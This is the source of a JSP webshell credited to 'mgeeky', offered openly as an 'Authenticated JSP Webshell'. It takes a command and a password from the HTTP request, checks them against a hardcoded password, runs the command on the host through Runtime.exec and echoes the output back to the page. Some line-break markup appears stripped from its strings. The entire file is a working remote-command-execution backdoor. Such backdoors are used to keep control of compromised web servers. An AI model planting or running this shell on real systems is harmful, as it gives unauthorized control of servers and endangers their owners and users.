<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%!
// =====================================================================
// Setup global password necessary to pass before using that webshell.
public String HardcodedPassword = "5eQzrXZHZwJNLvm6Q2b7PR6r";
// =====================================================================
public String execute(String pass, String cmd, Boolean skip) {
StringBuilder res = new StringBuilder();
if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(HardcodedPassword) || HardcodedPassword.toLowerCase().equals("none")))){
try {
Process proc = Runtime.getRuntime().exec(cmd);
OutputStream outs = proc.getOutputStream();
InputStream ins = proc.getInputStream();
DataInputStream datains = new DataInputStream(ins);
String datainsline = datains.readLine();
while ( datainsline != null) {
res.append(datainsline + "
");
datainsline = datains.readLine();
}
} catch( IOException e) {
return "IOException: " + e.getMessage();
}
}
else {
return "Wrong password or no command issued.";
}
String out = res.toString();
if (out != null && out.length() > 5 && out.indexOf("
") != -1) {
out = out.substring(0, out.length() - 5);
}
out = out.replaceAll("(\r\n|\n\r|\n|\r)", "
");
return out;
}
%>
JSP Application
Authenticated JSP Webshell.
You need to provide a valid password in order to leverage this application.
coded by mgeeky
<%
if (request.getParameter("cmd") != null && request.getParameter("password") != null) {
out.println("
server$ " + request.getParameter("cmd") + "
");
out.println(execute(request.getParameter("password"), request.getParameter("cmd"), false));
}
%>